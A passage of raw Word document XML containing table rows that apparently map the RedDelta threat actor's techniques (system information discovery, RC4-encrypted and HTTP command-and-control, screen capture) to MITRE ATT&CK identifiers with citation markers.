            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70AB3961" w14:textId="68A583AC" w:rsidR="007D27AE" w:rsidRDefault="00300ECF" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73C53FF0" w14:textId="77777777" w:rsidR="007D27AE" w:rsidRPr="00F808AD" w:rsidRDefault="007D27AE" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7132C435" w14:textId="23E213CC" w:rsidR="007D27AE" w:rsidRDefault="00300ECF" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="439E265B" w14:textId="2286A857" w:rsidR="007D27AE" w:rsidRPr="00992EC7" w:rsidRDefault="00B42656" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidR="00992EC7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>P-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="253249B3" w14:textId="215D7F5D" w:rsidR="007D27AE" w:rsidRDefault="007F11BC" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D27AE" w:rsidRPr="00ED5880" w14:paraId="5B7E5E8C" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32FE656A" w14:textId="0E07B4BD" w:rsidR="007D27AE" w:rsidRDefault="007D27AE" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="648562C8" w14:textId="3DCA23E3" w:rsidR="007D27AE" w:rsidRDefault="00D3430D" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D3430D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D3430D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D3430D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C2B733D" w14:textId="509EF1CE" w:rsidR="007D27AE" w:rsidRDefault="007D27AE" w:rsidP="007D27AE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1082 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Information Discovery</w:t>
            </w:r>
            <w:r w:rsidRPr="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59F0CA2B" w14:textId="521DFCAE" w:rsidR="007D27AE" w:rsidRDefault="00300ECF" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0588B9C1" w14:textId="77777777" w:rsidR="007D27AE" w:rsidRPr="00F808AD" w:rsidRDefault="007D27AE" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="694AC454" w14:textId="331E349B" w:rsidR="007D27AE" w:rsidRDefault="00300ECF" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="745AB297" w14:textId="26E29E24" w:rsidR="007D27AE" w:rsidRPr="00992EC7" w:rsidRDefault="00B42656" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidR="00992EC7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>P-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56823028" w14:textId="0C933B28" w:rsidR="007D27AE" w:rsidRDefault="007F11BC" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D27AE" w:rsidRPr="00ED5880" w14:paraId="2F718F7A" w14:textId="77777777" w:rsidTr="00432976">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A648B15" w14:textId="7798B652" w:rsidR="007D27AE" w:rsidRDefault="007D27AE" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E384F90" w14:textId="77777777" w:rsidR="007D27AE" w:rsidRDefault="007D27AE"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&amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61512439" w14:textId="77777777" w:rsidR="007D27AE" w:rsidRDefault="007D27AE" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C583E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1573.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001C583E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Encrypted Channel: Symmetric Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00E7818B" w14:textId="5E488CCB" w:rsidR="007D27AE" w:rsidRDefault="007D27AE" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00300ECF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C615503" w14:textId="77777777" w:rsidR="007D27AE" w:rsidRPr="00F808AD" w:rsidRDefault="007D27AE" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D0731AD" w14:textId="77777777" w:rsidR="007D27AE" w:rsidRDefault="007D27AE" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28099A22" w14:textId="3CFBC132" w:rsidR="007D27AE" w:rsidRPr="00992EC7" w:rsidRDefault="00992EC7" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00992EC7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="136ACD7E" w14:textId="77777777" w:rsidR="007D27AE" w:rsidRDefault="007D27AE" w:rsidP="00432976">
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RedDelta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> uses RC4 encryption</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="035A04AA" w14:textId="430E892A" w:rsidR="007D27AE" w:rsidRDefault="007D27AE" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D27AE" w:rsidRPr="00ED5880" w14:paraId="546D624D" w14:textId="77777777" w:rsidTr="00432976">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="329A0B1F" w14:textId="5318BC64" w:rsidR="007D27AE" w:rsidRDefault="007D27AE" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AA968E5" w14:textId="77777777" w:rsidR="007D27AE" w:rsidRDefault="007D27AE"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&amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="302A01B8" w14:textId="77777777" w:rsidR="007D27AE" w:rsidRPr="001C583E" w:rsidRDefault="007D27AE" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">T1071.001 </w:t>
            </w:r>
            <w:r w:rsidRPr="007367C1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5690B23B" w14:textId="414E6A15" w:rsidR="007D27AE" w:rsidRDefault="008D1F8F" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="081258BB" w14:textId="77777777" w:rsidR="007D27AE" w:rsidRPr="00F808AD" w:rsidRDefault="007D27AE" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42E2A280" w14:textId="77777777" w:rsidR="007D27AE" w:rsidRDefault="007D27AE" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B80D48E" w14:textId="212F5CBB" w:rsidR="007D27AE" w:rsidRPr="00992EC7" w:rsidRDefault="00992EC7" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00992EC7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68670D12" w14:textId="77777777" w:rsidR="007D27AE" w:rsidRDefault="007D27AE" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>RedDelta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> uses HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F11BC" w:rsidRPr="00ED5880" w14:paraId="5A76E94E" w14:textId="77777777" w:rsidTr="00432976">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18086909" w14:textId="42066A0F" w:rsidR="007F11BC" w:rsidRDefault="007F11BC" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15B24049" w14:textId="4E092353" w:rsidR="007F11BC" w:rsidRDefault="00300ECF"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0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7258E4F7" w14:textId="4311D626" w:rsidR="007F11BC" w:rsidRDefault="00300ECF" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1113 Screen Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5754DDA0" w14:textId="5199936C" w:rsidR="007F11BC" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DC733BD" w14:textId="77777777" w:rsidR="007F11BC" w:rsidRPr="00F808AD" w:rsidRDefault="007F11BC" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E18DA17" w14:textId="0BB9667C" w:rsidR="007F11BC" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A7364B7" w14:textId="5E6A9F1C" w:rsidR="007F11BC" w:rsidRPr="00992EC7" w:rsidRDefault="00992EC7" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="00B42656">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67EBC1CE" w14:textId="6C793D66" w:rsidR="007F11BC" w:rsidRDefault="007F11BC" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
